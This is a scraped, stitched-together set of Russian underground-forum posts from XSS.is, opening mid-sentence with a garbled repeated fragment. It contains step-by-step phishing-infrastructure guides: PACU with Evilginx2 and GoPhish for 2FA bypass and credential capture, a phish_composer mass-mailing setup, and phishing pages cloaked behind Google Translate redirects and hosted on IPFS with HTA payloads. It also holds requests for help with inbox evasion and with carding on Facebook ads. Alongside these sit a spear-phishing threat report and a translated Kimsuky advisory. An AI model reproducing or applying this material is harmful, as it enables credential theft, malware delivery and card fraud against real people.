аналогично, если отсутствует -g, то не будет использоваться GoPhish. Это полезно для некоторых операций где требуется только один из двух вариантов. После выполнения начальной команды, например, следующей команды Bash: pacu -d evil.com -p github -g track -c Вся настройка и создание приманки происходит только через скрипт. Evilginx2 будет выводиться непосредственно в stdout. Кроме того, через запятую указывается список имен хостов, которые должны быть настроены как DNS на Cloudflare или другом используемом DNS хостинге. Эти имена хостов будут получены автоматически из используемого phishlet и доменного имени, указанного вместе с -d. Ниже описаны некоторые дополнительные функции. evilmux подключается к сессии tmux, в которой запущен Evilginx2. evilmux-print печатает содержимое tmux-сессии в stdout. nginx-juice печатает несколько juice логов из NGiNX, включая IP источника, кукис, тело запроса POST, User Agent и т.д. (еще одно преимущество использования PACU). nginx-stop останавливает NGiNX, на случай если взаимодействие нужно временно приостановить. nginx-start запускает NGiNX после его остановки с помощью nginx-stop. remove полностью удаляет PACU. В случае использования параметра -g админ сервер GoPhish доступен по адресу https://172.16.238.4:3333. Для доступа к нему с другого клиента используйте локальный проброс портов SSH следующим образом. Bash: ssh -L 127.0.0.1:3333:172.16.238.4:3333 user@remotehost Данные для входа: admin:admin@gophish Конфигурация GoPhish должна быть выполнена вручную, включая настройку профилей рассылки, целевой страницы, шаблонов писем, пользователей и групп, атак и т.д. Заключение Мотивом этой статьи было указать на проблемы, с которыми обычно сталкивается специалист %22Red Team%22 (Атакующих) при настройке фишинговой инфраструктуры для социально-инженерной деятельности, и предложить простое решение для фишинговой инфраструктуры. Впереди еще много проблем, так что ждите новых статей в блоге. Специально для XSS.is Перевёл: IvanVasilyevich Предложил перевод: Aels Автор статьи: Shlok Актуальность: 30 Мая, 2022 Оригинал: https://payatu.com/blog/phishing-infrastructure-setup img_01.cleaned.png Вставить... Удалить img_01.cleaned.png 2399 x 1200 · 233.8 КБ img_02.cleaned.png Вставить... Удалить img_02.cleaned.png 702 x 447 · 327.3 КБ img_03.cleaned.png Вставить... Удалить img_03.cleaned.png 600 x 327 · 181.3 КБ img_04.cleaned.png Вставить... Удалить img_04.cleaned.png 800 x 318 · 28 КБ img_05.cleaned.png Вставить... Удалить img_05.cleaned.png 800 x 240 · 73.8 КБ img_06.cleaned.png Вставить... Удалить img_06.cleaned.png 734 x 471 · 52.3 КБ Прикрепить файлы Теги ×фишинг ×атака ×пентест ×тестирование на проникновение ×рассылка ×спам ×пентестинг ×красная команда ×перевод ×статья ×блог ×хакинг ×хакер ×phishing ×gophish ×evilginx ×phishlet ×pacu ×spam ×email ×pentest ×penetration test ×hack ×hacking ×pentesing ×crack ×cracker ×cyberattack ×redteaming Несколько тегов, разделяемые запятой. Настройки Отслеживать эту тему... и получать уведомления на электронную почту Underground СИ / Фишинг / APT / Мошенничество Выбор стиля 🇷🇺 Русский Помощь Главная RSS). Он может прослушивать 80/tcp или 443/tcp и исходя из поддомена, направлять трафик либо на контейнер Evilginx2, либо на контейнер GoPhish.
Поэтому, требуется еще один Docker контейнер NGiNX и хорошо написанный docker-
compose YAML.
Evilginx2 по умолчанию предлагает сгенерировать SSL сертификаты от Let's
Encrypt, и требует верификации домена. Это
совершенно бесполезно, поскольку Cloudflare уже позаботился о необходимости
SSL.
Использование самоподписного сертификата работает просто, для них Evilginx2
должен быть запущен в режиме
разработчика.
Осталось написать скрипт, который будет принимать данные, имя домена,
поддомены, используемый phishlet и т.д., а всю магию (модификацию docker-
compose.yml, генерацию самоподписного сертификата, настройку
NGiNX/GoPhish/Evilginx2) выполнял бы сам. Bash в этом случае вполне подойдет.
Вся эта работа уже была проделана под именем PACU , и с ней можно
ознакомиться здесь. Более подробная
информация о PACU, включая настройку и использование, будет представлена в
ближайшее время.
Хотя этот пункт является необязательным, но он интересен тем, что позволяет зафиксировать еще некоторые проблемы, с которыми пришлось столкнуться при создании PACU.
Во первых, для того чтобы Evilginx2 работал за NGiNX, в конфигурационном файле
NGiNX необходимо указать [эти
строки](https://github.com/thirdbyte/pacu/blob/main/nginx-
proxy/nginx.tmpl#L387-L388).
Во вторых, учитывая тот факт, что все три контейнера находятся в частной сети
и для Evilginx2 трафик идет с частного IPv4, назначенного NGiNX, Evilginx2
никогда не узнает реальный публичный IPv4-адрес жертвы, посетившей фишлет, а
будет регистрировать частный IPv4-адрес контейнера NGiNX для каждого запроса.
Это было исправлено путем внесения небольшого изменения в код Evilginx2, чтобы вместо него использовалось значение X-Real-IP, которое является http заголовком, используемым NGiNX для получения реального IP клиента. Но даже в этом случае IP адрес, который получит Evilginx2, будет принадлежать Cloudflare.
Для того чтобы NGiNX мог получить доступ к IP жертвы, общающейся с инфраструктурой Cloudflare, в конфигурационный файл NGiNX была внесена [еще одна модификация](https://github.com/thirdbyte/pacu/blob/main/nginx- proxy/nginx.tmpl#L3-L26), устанавливающая заголовок X-Real-IP в качестве значения заголовка CF-Connecting-IP, который он получает от Cloudflare. Это значение представляет собой реальный публичный IP посетителя.
К этому моменту стало ясно, что при установке и настройке Evilginx2 и GoPhish для типичной фишинговой атаки действительно существует множество проблем, и то что они уже устранены (теоретически должны быть до сих пор устранены) с помощью PACU, включая автоматическую подготовку с помощью Docker, docker- compose и простого скрипта, который еще предстоит продемонстрировать. И последнее...
PACU автоматизирует установку и настройку только двух из уже рассмотренных компонентов, GoPhish (Фреймворк для атак) и Evilginx2 (Фреймворк для фишинга).
Как уже говорилось выше, это единственные два компонента, которые должны быть размещены самостоятельно, и с ними связано наибольшее количество сложностей и проблем. Хотя интеграция других компонентов, таких как Cloudflare, AWS, MailGun, возможна, т.к. это управляемые сервисы и SaaS решения (арендуемые услуги). Некоторые из них являются платными, некоторые предоставляют пробные версии, а другие предоставляют ограниченные возможности бесплатно.
При интеграции нескольких таких сервисов для использования PACU потребуется точно такой же стек сервисов. Учитывая это, в PACU оставлена возможность получения реального IP посетителя с Cloudflare путем модификации конфигурационного файла NGiNX.
Чтобы подытожить всю рассмотренную выше инфраструктуру фишинга, ниже приведено ее наглядное представление.
Название происходит от имени всеядной южноамериканской пресноводной рыбы серрасальмиды, родственной пиранье. Поскольку эти рыбы довольно агрессивны, название хорошо соотносится с агрессивным характером "Red Team" (Атакующих) и фишинговых атак.
Чтобы удобно установить и настроить PACU для Ubuntu 20.04 LTS на AWS EC2 нужна всего одна команда.
Bash:Copy to clipboard
curl -sSL raw.githubusercontent.com/thirdbyte/pacu/main/init.sh | bash
Это вызывает сценарий init.sh, который устанавливает все зависимости, такие как docker, docker-compose, и клонирует репозиторий. Кроме того, он копирует скрипт setup.sh, в /usr/local/bin, чтобы его можно было вызвать из любого места командой pacu.
Чтобы убедиться в том, что PACU можно использовать в других дистрибутивах Linux и средах, не являющихся AWS EC2, можно воспользоваться ручным способом его настройки. Предполагается, что зависимости, как docker и docker-compose, уже установлены.
Bash:Copy to clipboard
git clone https://github.com/thirdbyte/pacu
cd pacu
chmod +x *.sh
./build.sh
./setup.sh (для запуска pacu)
Вызов pacu из shell (терминала) приведет к следующему.
Bash:Copy to clipboard
Usage: pacu -d example.org -p github # Инициализация Evilginx2
pacu -d example.org -g url # Инициализация GoPhish
pacu -d example.org -p github -g url # Инициализация Evilginx2 с GoPhish
pacu -d example.org -p github -g url -c # Включить поддержку Cloudflare при инициализации
pacu evilmux # Войти в tmux-сессию Evilginx2
pacu evilmux-print # Напечатать stdout из tmux-сессии Evilginx2
pacu nginx-juice # Напечатать juice лог из NGiNX
pacu nginx-stop # Остановить NGiNX
pacu nginx-start # Запуск NGiNX
pacu remove # Удаление pacu
Подсказка по использованию не требует пояснений.
Интересно отметить, что в случае отсутствия -p, Evilginx2 не будет использоваться, и аналогично, если отсутствует -g, то не будет использоваться GoPhish. Это полезно для некоторых операций где требуется только один из двух вариантов.
После выполнения начальной команды, например, следующей команды
Bash:Copy to clipboard
pacu -d evil.com -p github -g track -c
Вся настройка и создание приманки происходит только через скрипт. Evilginx2 будет выводиться непосредственно в stdout. Кроме того, через запятую указывается список имен хостов, которые должны быть настроены как DNS на Cloudflare или другом используемом DNS хостинге. Эти имена хостов будут получены автоматически из используемого phishlet и доменного имени, указанного вместе с -d.
Ниже описаны некоторые дополнительные функции.
В случае использования параметра -g админ сервер GoPhish доступен по адресу https://172.16.238.4:3333. Для доступа к нему с другого клиента используйте локальный проброс портов SSH следующим образом.
Bash:Copy to clipboard
ssh -L 127.0.0.1:3333:172.16.238.4:3333 user@remotehost
Данные для входа: admin:admin@gophish
Конфигурация GoPhish должна быть выполнена вручную, включая настройку профилей рассылки, целевой страницы, шаблонов писем, пользователей и групп, атак и т.д.
Мотивом этой статьи было указать на проблемы, с которыми обычно сталкивается специалист "Red Team" (Атакующих) при настройке фишинговой инфраструктуры для социально-инженерной деятельности, и предложить простое решение для фишинговой инфраструктуры. Впереди еще много проблем, так что ждите новых статей в блоге.
Специально
дляXSS.is
Перевёл:IvanVasilyevich**
Предложил перевод: Aels
Автор статьи: Shlok
Актуальность: 30 Мая, 2022
Оригинал: https://payatu.com/blog/phishing-infrastructure-setup**
Какие способы входа в домашний банкинг с 2-х факторным доступом?
Gophish — фреймворк, который позволяет проверить реакцию сотрудников компании на фишерские послания. Его идея оказалась настолько привлекательной, что фишеры уже стали делать собственные средства автоматизации по его подобию.
Evilginx 2 - это обратный прокси-сервер и готовый фреймворк для выполнения MITM-атаки с целью обхода двухфакторной аутентификации. В нем автоматизировано все, что только можно.
Покупаем VPS и устанавливаем докер
apt install docker.io docker-compose
Клонируем репозиторий
git clone https://github.com/ahhh/phish_composer.git
cd phish_composer
Вносим изменения в файл docker-compose.yml
nano docker-compose.yml
Находим строки
- OPENDKIM_DOMAINS=smtp.domain.tld
- MAIL_RELAY_HOST='smtp.gmail.com'
- MAIL_RELAY_PORT='587'
- MAIL_RELAY_USER='your_gmail_addr@gmail.com'
- MAIL_RELAY_PASS='your_gmail_pass'Click to expand...
И заменяем на свои данные для рассылок.
Так же есть файл evilginx2/config.yaml в котором находятся настройки от evilnginx2.
Начинаем установку
sudo docker-compose up -d
Проверяем запущено ли все
sudo docker ps
Для подключения к evilginx2 можно воспользоваться командой
sudo docker attach
sudo docker ps | grep evilginx2 | cut -d ' ' -f1``
Gophish админннка находится на 3333 порту.
Удачной рыбалки
Наткнулся на замечательный и актуальный материал, думаю многим будет интересно прочитать, т.к. почти ежедневно я слышу одни и те же вопросы - люди спрашивают лично, в пм или на форуме.
Источник: [https://raw.githubusercontent.com/vc0RExor/Malware-Threat- Reports/main/TA0001 [PHISHING]/Evolution of SpearPhishing/Inside Look_Evolution of Spear-Phishing Techniques of Notorious Threat groups_EN.pdf](https://raw.githubusercontent.com/vc0RExor/Malware-Threat- Reports/main/TA0001%20%5BPHISHING%5D/Evolution%20of%20SpearPhishing/Inside%20Look_Evolution%20of%20Spear- Phishing%20Techniques%20of%20Notorious%20Threat%20groups_EN.pdf)
Эволюция Spear-Phishing - техники известных групп, взгляд изнутри
1. Обзор
Этот отчет содержит аналитику Тактик, Техник и Методов (TTP), характерных для некоторых вредоносных программ в контексте недавних кампаний целевого фишинга (Spear-Phishing), предпринимаемых различными группами злоумышленников.
В последние годы развитие получили кампании злоумышленников, угроза от которых исходит через один и тот же вектор: электронную почту. Этот способ получения первоначального доступа иногда представляется абсурдным и недостойным внимания, предполагая, что компании давно и должным образом ознакомили своих сотрудников с рисками использования электронной почты. Однако тенденция говорит нам об обратном. Многие преступные группы и APT активно продолжают использовать этот метод , видоизменяя и развивая его, полагаясь на наиболее уязвимый элемент — человеческую ошибку.
Фишинг (T1566), как метод социальной инженерии, используется для получения первоначального доступа (TA0001) как минимум с середины 90-х годов, и является не чем иным как инструментом, позволяющим обманом вынудить жертву самостоятельно предоставить конфиденциальную информацию злоумышленнку. Мошенники маскируют свои электронные письма под корреспонденцию, которая покажется жертве знакомой и которую трудно (в большинстве случаев) с первого взгляда отличить от настоящей корреспонденцию, которую злоумышленники и пытаются имитировать.
Вместе с техникой целевого фишинга (Spear-Phishing) мы выделяем разные подтехники (T1566.001, T1566.002, T1566.003). В этих техниках используются мошеннические электронные письма, побуждающие жертву щелкнуть ту или иную ссылку, открыть вложение и т. д.
2. Как используются эти техники?
Эволюция таких техник как целевой фишинг (spear-phishing) заключается в том, как группы, использующие эти техники, адаптировали их и улучшили свои методы работы с течением времени. Стоит отметить, что развитие техник было не линейным, и все рассмотренные техники используются на протяжении долгих лет.
Хотелось бы подчеркнуть не только развитие самих техник, но и их постоянство на протяжении многих лет, позволяющих эффективно получить первоначальный доступ к инфраструктуре для последующей реализации полного цикла атаки.
3. Насколько серьезна угроза?
Вопрос встает до того, как инцидент имел место. Есть «менее опасные» группы, использующие целевой фишинг (Spear-Phishing) в качестве начального инструмента проникновения в сеть жертвы. Но метод используется и более серьезные криминальные группировки (APT). Мы выявили большое количество инцидентов, которые начинаются с этой, казалось бы, простой тактики , включающей в себя разные этапы на протяжении всего цикла атаки злоумышленников.
На всех этих этапах в зависимости от своих целей злоумышленники будут
пытаться обнаружить как можно больше устройств в сети и далее разворачиваться
в горизонтальном направлении и устанавливать вредоносное ПО на этих
устройствах для получения как можно большей информации об инфраструктуре
сети. Подобную информацию об инфраструктуре сети возможно продать позже
другим злоумышленникам или использовать ее в рамках для своей общей стратегии
проникновения в корпоративную сеть. На разных этапах атаки в ней могут
принимать участие разные криминальные группы, один из вариантов использования
такой информации об инфраструктуре сети - захват контроллера домена и запуск
программы-вымогателя с последующим получением выкупа для расшифровки
атакованных файлов. Возможен и сценарий, когда деньги будут вымогаться у
поставщиков или других контрагентов жертвы.
4. Какие существуют новые методы подобной атаки и кто их использует?
В настоящее время атака Spear-Phishing продолжает развиваться. В последние недели мы наблюдали большое количество кампаний, эксплуатируемых OneNote для своих целей , помимо использования уже привычных нам методов.
Вот некоторые семейства вредоносных программ, которые были замечены нами в
применении новой методологии:
**• Emotet | Heodo
• Qbot | QakBot
• AsyncRAT
• Remcos
• IcedID
Все эти вредоносные программы используются различными преступными группировками и APT** для полноценной атаки на ту или иную компанию в зависимости от целей кампании.
Краткое описание функций этих программ отображено на схеме ниже:
5. Понимание новых техник.
Для начала злоумышленники пытаются получить доступ к устройству через переход жертвы по ссылке в письме из электронной почты. Например, вас вынуждают загрузить вложение к письму - таким вложением в данном случае будет OneNote.
Ищем файлы Spear-Phishing по запросу OneNote:
Как мы уже упоминали, кроме OneNote в зависимости от конкретной кампании возможно встретить и такие документы как Excel или Word с макросами, ссылками и т. д. Кампании в зависимости от атакующей группы злоумышленников и их цели-жертвы будут более или менее целевыми, более или менее изощренными.
В примере ниже мы нашли подобные примеры Spear-Phishing.
**
Источник, откуда отправляются эти электронные письма, может различаться**: например, они могут отправляться с скомпрометированных серверов электронной почты организации или напрямую с ботнетов. Злоумышленники обычно используют прокси-серверы для скрытия своего местоположения, но иногда возможно определить локацию злоумышленников.
Текст электронного письма обычно попытается мотивировать вас загрузить приложенный файл или перейти по ссылке с пометкой "Срочно" или другой подходящей темой письма.
После этого, в зависимости от разновидности кампании злоумышленников, мы увидим баннер OneNote, который смотивирует нас кликнуть на него для доступа к контенту. Результатом будет выполнение вредоносного ПО.
В данном случае под панелью мы увидим иконкуисполняемого скрипта VBS ,
стоит отметить, что с OneNote возможно использовать любую другую иконку
скрипта (JS, HTA...) с подходящей ссылкой для подгрузки пейлоада на следующем
этапе и т. д. Возможно легко **перетащить и получить сценарий, который будет
исполняться в фоновом режиме.
**
В каждом из рассмотренных OneNote вложений имеются разные типы объектов ,
некоторые из которых используются для введения в заблуждение жертвы, другие
для прямого выполнения команд или сценариев, выполнения и записи вредоносных
файлов во время последующих этапов атаки:
Как мы уже упоминали, мы можем встретить и другие изображения, мотвирующие жертву нажать на кнопку, которая представляет собой простой PNG, под которым в данном случае находится реальная кнопка.
Любопытным случаем будет объект задания, который не является статическим и
может мегяться. Обычно он содержит скрипт, который выполняет загрузку, а затем
выполняет файл, но возможен и более запутанный скрипт, который будет
содержать бинарник, исполняемый позже.
После извлечения мы увидим разные скрипты с различным весом файлов, свидетельствующий наличие нескольких сэмплов.
Все это связано с уровнем обфускации: например, если скрипты содержат в себе
бинарник, который будет выполнен позже и т. д. Простейшим примером будет
скрипт, который попытается выполнить загрузку пейлоада на вредоносный домен,
а затем выполнить его , в данном примере это библиотека, которая будет
запущена через rundll32.exe.
Чаще всего можно встретить OneNote, выполняющий Wscript, который запустит
Rundll32 или Regsvr32.
Но т.к. существует множество групп злоумышленников (и их кампаний,
использующих OneNote), на схеме ниже мы попытались представить наиболее
интересные ветки процессов, которые мы встретили при анализе различных
кампаний.
Следует отметить, что в некоторых семействах вредоносных программ таких как
AsyncRat расширение файла иногда дублируется. Это связано с тем, что в
сотрудникам компаний часто не отображается расширение файлов в их офисной
среде, поэтому мы можем увидеть некоторые файлы с дублирующимися расширениями
файлов:
• <Файл>.bat.exe
• <Файл>.pdf.exe
• <Файл>.vbs.exe
На данном этапе вредоносная программа уже загружена или запущена одним из упомянутых ранее способов. Пока мы обсудили только технику целевого фишинга (Spear-Phishing) и принцип ее работы в реальной атаке. Обычно этот метод чередует некоторые этапы атаки в зависимости от группы злоумышленников и их кампаний. В воздухе остается вопрос - какие методы и цели будет преследовать злоумышленник со своим вредоносным ПО после получения первоначального доступа? Этот вопрос опять же будет варьироваться в зависимости от того, кто стоит за кампанией, к какому сектору принадлежит жертва, какое вредоносное ПО будет использоваться для этой цели и т. д.
6. Вредоносное ПО, используемое в кампаниях
Как мы уже упоминали ранее, существует большое количество вредоносных программ, которые задействованы на всех этапах Spear-Phishing. Поэтому мы попытаемся обобщить роль каждого из этих семейств вредоносных программ и понять, какое влияние они могут оказать на инфраструктуру жертвы.
6.1. Qbot | Qakbot
Qbot — это вредоносное ПО, которое эволюционировало в различных дисциплинах - таких как Banker, Stealer, Backdoor и т.д. Его основная функция — получение конфиденциальной информации с устройства жертвы и передача ее на удаленные серверы злоумышленника. Различные криминальные группы использовали Qbot исторически, такие как - EvilCorp , более известной использованием такого софта как Dridex, или GoldCabin , другая преступная группа, связанная с такими известными вредоносными программами как BokBot (IcedID), которые также адаптировали для своих атак фишинг.
Кампании новых версий Qbot можно резюмировать следующим образом:
После Spear-Phishing, стадии которого мы уже описали выше, будет выполнена прямая загрузка или выполнение библиотеки , через Regsvr32 или Rundll32.
После исполнения Qbot чаще всего выполняет инъекцию в реальный процесс. В данной кампании широко использовался Wermgr.exe, в рамках этого процесса возможно взаимодействовать с большим количеством скрытых возможностей, поскольку это обычный процесс для любой инфраструктуры сети.
**
Инъекция обычно происходит с использованием ProcessHollowing** : мы можем увидеть создание процесса Wermgr.exe (это не всегда wermgr , но каждый раз имеется внутренний список различных процессов, которые проверяются перед инъекцией) в приостановленном состоянии и инжект необходимого кода, резервируя место в этом процессе.
После этого процесс закрепляется в известных разделах реестра, таких как CurrentVersion\Run или tasks , где также будут созданы другие записи, в которых будет хранится необходимая информация об активной кампании. Обычно здесь сохраняются данные о том, где находится вредоносная библиотека, запущенная на предыдущем этапе.
После этого **зловред может устанавливать соединения с внешним миром и отправлять конфиденциальную информацию с жертвы на сервера C &C.
**
Знаю,что-то типо нашего авито,дрейнеры и прочая крипта не интересна
Увидел такой топик на whh, но рекламят там только самый худший шоп ларри клаб
Давайте обсуждать актуальные НОРМАЛЬНЫЕ ШОПЫ
Пример фишинговой страницы: [https://903884b-infura--ipfs- io.tra...uto&_x_tr_tl=en&_x_tr_hl=en-US&_x_tr_pto=wapp](https://903884b-infura --ipfs- io.translate.goog/ipfs/QmWgxs4qXdszosPYHUGHFYryYEXXAtd2FDJeLWQF6SJo52?info@tesla.com+&_x_tr_sl=en&_x_tr_tl=ja&_x_tr_hl=en- GB&_x_tr_pto=ajax,op&_x_tr_sl=auto&_x_tr_tl=en&_x_tr_hl=en-US&_x_tr_pto=wapp)
Меняем домен в ссылке "tesla.com" на "facebook.com": [https://903884b-infura--
ipfs-io.tra...uto&_x_tr_tl=en&_x_tr_hl=en-
US&_x_tr_pto=wapp](https://903884b-infura--ipfs-
io.translate.goog/ipfs/QmWgxs4qXdszosPYHUGHFYryYEXXAtd2FDJeLWQF6SJo52?info@facebook.com+&_x_tr_sl=en&_x_tr_tl=ja&_x_tr_hl=en-
GB&_x_tr_pto=ajax,op&_x_tr_sl=auto&_x_tr_tl=en&_x_tr_hl=en-US&_x_tr_pto=wapp)
**Что здесь происходит?
1. Редирект через Google Translate.**
В случае XSS.is формат редиректа будет такой: [https://xss-
is.translate.goog/forum...jax,op&hl=ru&_x_tr_pto=ajax,op&_x_tr_sl=auto&](https://xss-
is.translate.goog/forums/84/?_x_tr_sl=auto&_x_tr_tl=ru&_x_tr_pto=ajax,op&hl=ru&_x_tr_pto=ajax,op&_x_tr_sl=auto&)
Таблица кодирования-декодирования:
proxyUrl | decodeHostname
---|---
https://example-com.translate.goog | example.com
https://foo-example-com.translate.goog | foo.example.com
https://foo--example-com.translate.goog | foo-example.com
https://0-57hw060o-com.translate.goog/?_x_tr_enc=0 | xn--57hw060o.com (.com)
https://1-en--us-example-com/?_x_tr_enc=1 | en-us.example.com
https://0-en----w45as309w-com.translate.goog/?_x_tr_enc=0 | xn--en--w45as309w.com (en-.com)
https://1-0-----16pw588q-com.translate.goog/?_x_tr_enc=0,1 | xn----16pw588q.com (-.com)
https://lanfairpwllgwyngyllgogerychwyrndrobwllllantysiliogogogoch-co-uk.translate.goog/?_x_tr_hp=l | llanfairpwllgwyngyllgogerychwyrndrobwllllantysiliogogogoch.co.uk
https://lanfairpwllgwyngyllgogerych...gogogoch-co-uk.translate.goog/?_x_tr_hp=www-l | www.llanfairpwllgwyngyllgogerychwyrndrobwllllantysiliogogogoch.co.uk
https://a--aaaaaaaaaaaaaaaaaaaaaaaa...xn--xn--xn--xn--xn--------------------------a | a-xn-xn-xn-xn-xn-------------aa-aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa.com
https://g5h3969ntadg44juhyah3c9aza8...b-com.translate.goog/?_x_tr_enc=0&_x_tr_hp=0- | xn--g5h3969ntadg44juhyah3c9aza87iiar4i410avdl8d3f1fuq3nz05dg5b.com (.com)
Как избавиться от баннера Google Translate:
Code:Copy to clipboard
body > .skiptranslate {
display: none;
}
Как подменить лого с определенного запроса (пример с tesla.com/facebook.com):
Code:Copy to clipboard
$ ("#logoimg").attr("src", "https://www[.]google[.]com/s2/favicons?domain="+my_slice);
$ ("#logoname").html(finalu);
///////////new injection////////////////
count=count+1;
2. Хостинг фишинг-страниц с IPFS.
IPFS - это InterPlanetary File System, “a peer-to-peer hypermedia protocol
designed to make the web faster, safer, and more open”, так называемый Web
3.0.
Можно шарить файлы, приложения и многое другое через децентрализованную сеть.
Пример №1: хостим пейлоад.
Устанавливаем последний пакет IPFS с https://dist.ipfs.io/#go-ipfs
Распаковываем и исполняем с привилегиями root:
tar -zxvf go-ipfs_v0.4.22_linux-amd64.tar.gz
Примеры со скриншотов всегда с правами рута, возможно разумнее исполнять IPFS
скрипты из под пользователя.
Создайте директорию с файлами пейлоада и сам “Get-Process” пейлоад. Формат
может быть любой - binary, .ps или что-то иное.
Теперь инициализируем IPFS:
Запускаем демон, файл конфигурации находится здесь: ~/.ipfs/config
Демон начинает синхронизироваться с сетью. Все, что нам нужно, добавить наш
файл в сеть с помощью команды “ipfs add test.ps1”:
На выходе получаем хэш, что и является адресом нашего файла в сети. Все
последствия в IPFS сети необратимые: как только мы получили хэш, файл уже
нельзя изменить. Если файл нужно изменить, мы просто перегружаем его снова и
получаем новый хэш.
Существует также графический интерфейс демона, который запускается по
адресу localhost:5001/webui, кому удобнее - используйте его:
Большой минус IPFS: скорость распространения файла по сети, весь процесс может занять как минимум несколько минут. Пока трансляция не завершена, гейт не сможет найти ваш файл. Далее он будет доступен через адрес гейта: https://ipfs.io/ipfs/<QMhash>. Невероятно, но факт: Cloudflare поддерживает IPFS сеть, это означает, что файл будет также доступен по адресу: [https://cloudflare-](https://cloudflare- ipfs.com/ipfs/%3cQMhash)[ipfs.com/ipfs/<QMhash](https://cloudflare- ipfs.com/ipfs/%3cQMhash)>
Пример №2: хостим фишинг-страницу.
В данном примере расмотрим как создать и загрузить простейшую фишинг-страницу
с пейлоадом в IPFS.
Создадим index.html, который будет содержать вредоносный .HTA файл:
Делаем пейлоад. В примере исполняется calc и после закрывается:
Абсолютно также, как мы уже делали в примере выше, загружаем файлы в IPFS. В данном примере мы помещаем файлы в /web директорию, исполняем команду “ipfs add -r web”, чтобы получить хэши файлов и загрузить их в IPFS.
На этот раз мы также загрузим наши файлы в IPNS. Когда мы публикуем файлы в IPNS, мы получаем статический хэш, который может быть использован повторно, если мы меняем наши файлы. Если мы изменили файлы после загрузки в сеть, просто перегружаем их и публикуем в сеть снова. В результате файлы будут доступны по адресу того же хэша на; ipfs.io/ipns/qmhash.
По сути, все, что мы должны сделать, поменять ipfs/ на ipns/. Больше
документации по поводу IPNS доступно по адресу:
https://docs.ipfs.io/guides/concepts/ipns/
Итого: мы создали и захостили фишинговую страницу, которая будет теперь доступна через IPFS.io, CloudFlare или напрямую через ваш собственный гейтвей (читаем документацию).
Примеры активных кампаний , используя методы, что я описал выше:
Источники:
im struggling with html letter encryption whenerver i try with some tools it doesnt hit any inbox. any information regarding html letter encryption mehtods will be helpful
Доброго времени суток! Хочу попробовать вбивать карты в fb ads. Подскажите какое гео и бины лучше всего подходят. В арбитраже есть опыт в районе 2-х лет. Ресурсы и мат. тоже есть! Но нет понимания как лучше всего это провернуть. Заранее спасибо!!!
**Методы социальной инженерии, которые использует Северная Корея против аналитических и научных центров и СМИ
Краткое содержание**
ФБР, Госдеп США, АНБ и национальная разведывательная служба и МИД Южной Кореи совместно выпустили этот биллютень, чтобы осветить методы социальной инженерии, используемые хакерскими группировками КНДР против своих целей в аналитических и научных центрах и СМИ по всему миру. Северокорейские хакеры активно проводят свои целевые фишинговые атаки, выдавая себя за настоящих журналистов, ученых и других лиц, имеющих заслуженную репутацию в контексте геополитических исследований Северной Кореи. КНДР использует социальную инженерию для сбора информации о геополитических событиях, о политических стратегиях и о дипломатии, касающихся интересов Северной Кореи через получение доступов к частным документам, исследованиям и каналам коммуникаций своих целей.
Предпосылки
Киберпрограмма Северной Кореи обеспечивает режим разведданными через широкими возможности кибершпионажа. Правительства Соединенных Штатов и Южной Кореи имели возможность наблюдать за постоянными кампаниями северокорейских хакеров по сбору разведовательной информации. Основная разведывательная организация Северной Кореи - Генеральное Бюро Разведки (RGB) (под санкциями Совета Безопасности ООН) является главным организатором активной хакерской сети, работающей над этим проектом.
Основные цели киберпрограммы КНДР: обеспечивать доступ режима к актуальной разведывательной информации о Соединенных Штатах, Южной Корее и других странах, представляющих угрозы для политической, военной или экономической безопасности и стабильности режима. В настоящее время правительства США и Республики Корея, а также частные компании по кибербезопасности, следят за основными хакерскими группировками, спонсируемые КНДР и стоящими за широкомасштабные кампаниями социальной инженерии, известными как Kimsuky , Thallium , APT43 , Velvet Chollima и Black Banshee.
Kimsuky является непосредственным юнитом Генерального Бюро Разведки (RGB) Северной Кореи и проводит широкие кибер-кампании в поддержку целей RGB как минимум с 2012 года. Основная миссия Kimsuky — предоставлять разведовательные данные и ценную геополитическую информацию северокорейскому режиму. К сожалению, многие организации не считают свои исследования и сообщения конфиденциальными и склонны игнорировать угрозу кампаний социальной инженерии, не имею представление о ценности данной информации в рамках активных кампаний для широкого кибершпионажа.
Однако, как нам стало известно, Северная Корея в значительной степени полагается на такие разведывательные данные, полученные путем компрометации данных с научных и аналитических центров. Кроме того, успешные кампании позволяют Kimsuky в дальнейшем создавать более достоверные и эффективные целевые фишинговые рассылки, которые можно использовать против более важных целей. Мы считаем, что повышение осведомленности о некоторых этих кампаниях и использование базовых практик по кибербезопасности помогут снизить эффективность фишинговых операций Kimsuky.
Этот биллютень предоставляет подробную информацию о том, как действуют хакеры Kimsuky : красные флаги и общие темы кампаний, и информация, которая поможет разработать меры противодействия таким кампаниям в дальнейшем, и внедрить средства для лучшей защиты от операций Kimsuky по всему миру.
Операции Kimsuky: социальная инженерия
Пример скрипта для генерации фишинговых писем северокорейских хакеров
В контексте кибербезопасности социальная инженерия — это широкий термин, включающий в себя приемы, провоцирующие человеческую ошибку и дальнейшее манипулирование целью, чтобы раскрыть конфиденциальную информацию для злоумышленников. Северокорейские хакеры используют методы социальной инженерии главным образом для получения конфиденциальных данных со своих целей. Среди трюков социальной инженерии важное место занимет - spearphishing - использование сфабрикованных писем для обмана жертвы и получение доступа к ее устройствам и сетям. Уже более десяти лет актеры Kimsuky совершенствуют навыки социальной инженерии, затрудняя их выявление.
Кампании целевого фишинга Kimsuki начинаются с подготовки - основательного ресерча их целей. Чаще всего хакеры КНДР используют открытую информацию (OSINT) для выявления потенциальных целей, а затем адаптируют виртуальные персонажи, которые выглядят убедительными для жертв их кампаний. Kimsuky создают адреса электронной почты, которые схожи с электронными адресами реальных лиц и которые будут в дальнейшем использоваться для регистрации доменов и создания текстов фишинговых писем. Злоумышленники часто используют домены, напоминающие распространенные интернет-сервисы и сайты СМИ, чтобы ввести в заблуждение свои цели.
Примечательно, что ответы жертв на письма-приманки также дают дополнительную разведовательную информацию Пхеньяну для дальнейших кампаний целевого фишинга. Сбор разведовательных данных с аккаунтов аналитиков-наблюдателей за КНДР представляет большую ценность для режима Северной Кореи и обеспечивает важный канал равездовательной информации.
КРАСНЫЕ ИНДИКАТОРЫ
Потенциальные цели атак Северной Кореи должны быть осведомлены о следующих действиях, которые чаще всего являются признаками активных операций злоумышленников из КНДР.
КАМПАНИИ И ТЕМЫ
Kimsuky выстраивают свои фишинговые кампании вокруг тем, интересующих свои цели, формируя соответсвующе их содержание и разводку, с помощью которой будет осуществляться дальнейшая компроментация устройства жертвы.
